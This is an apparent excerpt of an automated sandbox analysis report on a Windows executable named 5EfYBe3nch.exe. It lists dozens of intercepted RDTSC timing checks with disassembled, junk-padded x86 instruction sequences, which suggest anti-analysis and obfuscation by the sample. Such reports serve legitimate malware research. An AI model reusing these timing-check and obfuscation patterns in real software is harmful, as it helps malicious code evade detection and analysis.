                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA135 second address: CAA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD668F2A643h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA3C5 second address: CAA3CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD668F2A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA7F7 second address: CAA7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA943 second address: CAA947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAA947 second address: CAA962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD668F2A63Ah 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAAAB second address: CAAAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAAB0 second address: CAAB0F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A638h 0x00000008 pushad 0x00000009 jnp 00007FD668F2A636h 0x0000000f jo 00007FD668F2A636h 0x00000015 jmp 00007FD668F2A644h 0x0000001a jmp 00007FD668F2A63Bh 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007FD668F2A63Bh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pushad 0x00000030 popad 0x00000031 pop edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD668F2A63Eh 0x00000039 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADA20 second address: CADA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD4E second address: CADD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD668F2A642h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD6A second address: CADD6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CADD6F second address: CADD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dl, FFFFFF86h 0x0000000d push dword ptr [ebp+122D21DBh] 0x00000013 mov edx, dword ptr [ebp+1244CA28h] 0x00000019 mov dx, 766Ah 0x0000001d push 8E3877EFh 0x00000022 pushad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAFFF second address: BCB003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C0440 second address: 52C044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C044F second address: 52C04DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD668F2A76Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD668F2A771h 0x00000017 add ax, D0D6h 0x0000001c jmp 00007FD668F2A771h 0x00000021 popfd 0x00000022 pushad 0x00000023 mov eax, 08C95E99h 0x00000028 popad 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FD668F2A774h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD668F2A777h 0x00000039 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C04DE second address: 52C04E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C04E5 second address: 52C0500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b jmp 00007FD668F2A76Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cx, 80F7h 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C0500 second address: 52C0540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD668F2A648h 0x00000016 or ch, 00000048h 0x00000019 jmp 00007FD668F2A63Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52C059B second address: 52C05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F05C8 second address: 52F0673 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD668F2A642h 0x00000008 or ecx, 572DFBD8h 0x0000000e jmp 00007FD668F2A63Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dl, cl 0x0000001b movsx edi, cx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FD668F2A643h 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FD668F2A646h 0x0000002b mov ebp, esp 0x0000002d jmp 00007FD668F2A640h 0x00000032 xchg eax, ecx 0x00000033 jmp 00007FD668F2A640h 0x00000038 push eax 0x00000039 jmp 00007FD668F2A63Bh 0x0000003e xchg eax, ecx 0x0000003f jmp 00007FD668F2A646h 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov ax, 45B3h 0x0000004c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0673 second address: 52F06AF instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD668F2A771h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FD668F2A76Eh 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD668F2A76Ah 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06AF second address: 52F06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06B3 second address: 52F06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F06B9 second address: 52F0723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 071D5D73h 0x00000008 pushfd 0x00000009 jmp 00007FD668F2A648h 0x0000000e xor ax, 7478h 0x00000013 jmp 00007FD668F2A63Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD668F2A63Bh 0x00000026 adc ax, 443Eh 0x0000002b jmp 00007FD668F2A649h 0x00000030 popfd 0x00000031 mov esi, 71D08387h 0x00000036 popad 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0723 second address: 52F0774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 41BEEC02h 0x00000010 pushfd 0x00000011 jmp 00007FD668F2A773h 0x00000016 add ah, FFFFFFFEh 0x00000019 jmp 00007FD668F2A779h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0774 second address: 52F0778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0778 second address: 52F077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F077E second address: 52F0793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A641h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F07E9 second address: 52F07EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F07EE second address: 52F083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD668F2A63Eh 0x00000013 and ecx, 09017C48h 0x00000019 jmp 00007FD668F2A63Bh 0x0000001e popfd 0x0000001f jmp 00007FD668F2A648h 0x00000024 popad 0x00000025 mov esi, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F083D second address: 52F0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0841 second address: 52F0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F0845 second address: 52F084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F084B second address: 52F0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52F08D5 second address: 52E0035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FD668F2A76Eh 0x0000000f leave 0x00000010 jmp 00007FD668F2A770h 0x00000015 retn 0004h 0x00000018 nop 0x00000019 sub esp, 04h 0x0000001c cmp eax, 00000000h 0x0000001f setne al 0x00000022 xor ebx, ebx 0x00000024 test al, 01h 0x00000026 jne 00007FD668F2A767h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FD66D8179BFh 0x00000034 mov edi, edi 0x00000036 jmp 00007FD668F2A76Eh 0x0000003b xchg eax, ebp 0x0000003c jmp 00007FD668F2A770h 0x00000041 push eax 0x00000042 jmp 00007FD668F2A76Bh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov eax, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0035 second address: 52E003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E003A second address: 52E00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 pushfd 0x00000006 jmp 00007FD668F2A775h 0x0000000b xor al, FFFFFFD6h 0x0000000e jmp 00007FD668F2A771h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007FD668F2A76Eh 0x0000001e sub esp, 2Ch 0x00000021 jmp 00007FD668F2A770h 0x00000026 xchg eax, ebx 0x00000027 jmp 00007FD668F2A770h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD668F2A76Dh 0x00000036 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E00B3 second address: 52E00B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E00B9 second address: 52E00D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A773h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E01B7 second address: 52E01D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ch, bl 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E028A second address: 52E0299 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0299 second address: 52E029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E029D second address: 52E02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02A1 second address: 52E02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02A7 second address: 52E02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 522Dh 0x00000007 pushfd 0x00000008 jmp 00007FD668F2A76Ah 0x0000000d sub cx, 22C8h 0x00000012 jmp 00007FD668F2A76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD668F2A76Bh 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02DD second address: 52E02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02FA second address: 52E030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E030B second address: 52E030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E030F second address: 52E0315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0315 second address: 52E031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0346 second address: 52E036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ebx 0x00000006 popad 0x00000007 mov esi, 56B94C73h 0x0000000c popad 0x0000000d jg 00007FD6D986889Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FD668F2A76Bh 0x0000001b mov ax, F7BFh 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E036C second address: 52E0400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edi, 09E4F842h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FD668F2A69Bh 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD668F2A63Fh 0x0000001a sub ecx, 2E437F3Eh 0x00000020 jmp 00007FD668F2A649h 0x00000025 popfd 0x00000026 push esi 0x00000027 mov esi, edi 0x00000029 pop edx 0x0000002a popad 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e jmp 00007FD668F2A646h 0x00000033 jne 00007FD6D9868703h 0x00000039 jmp 00007FD668F2A640h 0x0000003e mov ebx, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD668F2A647h 0x00000048 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0400 second address: 52E042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 push ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E042E second address: 52E044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E044B second address: 52E04E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A777h 0x00000008 pushfd 0x00000009 jmp 00007FD668F2A778h 0x0000000e add ch, 00000048h 0x00000011 jmp 00007FD668F2A76Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD668F2A76Bh 0x00000026 and al, FFFFFF8Eh 0x00000029 jmp 00007FD668F2A779h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD668F2A770h 0x00000035 adc esi, 03E3D408h 0x0000003b jmp 00007FD668F2A76Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E04E3 second address: 52E052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD668F2A63Ch 0x00000011 and cl, FFFFFF98h 0x00000014 jmp 00007FD668F2A63Bh 0x00000019 popfd 0x0000001a mov ax, F34Fh 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E052A second address: 52E0530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0530 second address: 52E0558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 mov ax, di 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0558 second address: 52E0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A777h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0573 second address: 52E05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD668F2A63Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD668F2A63Ch 0x0000001b sub al, 00000048h 0x0000001e jmp 00007FD668F2A63Bh 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E05C4 second address: 52E05D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A770h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0617 second address: 52E0652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD668F2A648h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0652 second address: 52E0658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0658 second address: 52D07A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D9868621h 0x0000000f xor eax, eax 0x00000011 jmp 00007FD668F03D6Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007FD668F2A847h 0x0000002e call 00007FD66D807DDCh 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 jmp 00007FD668F2A643h 0x0000003b movzx eax, di 0x0000003e popad 0x0000003f push ecx 0x00000040 jmp 00007FD668F2A640h 0x00000045 mov dword ptr [esp], ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07A8 second address: 52D07AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07AE second address: 52D07BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Bh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07BD second address: 52D07C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07C1 second address: 52D07D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07D1 second address: 52D07D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07D5 second address: 52D07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52D07E3 second address: 52D07E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
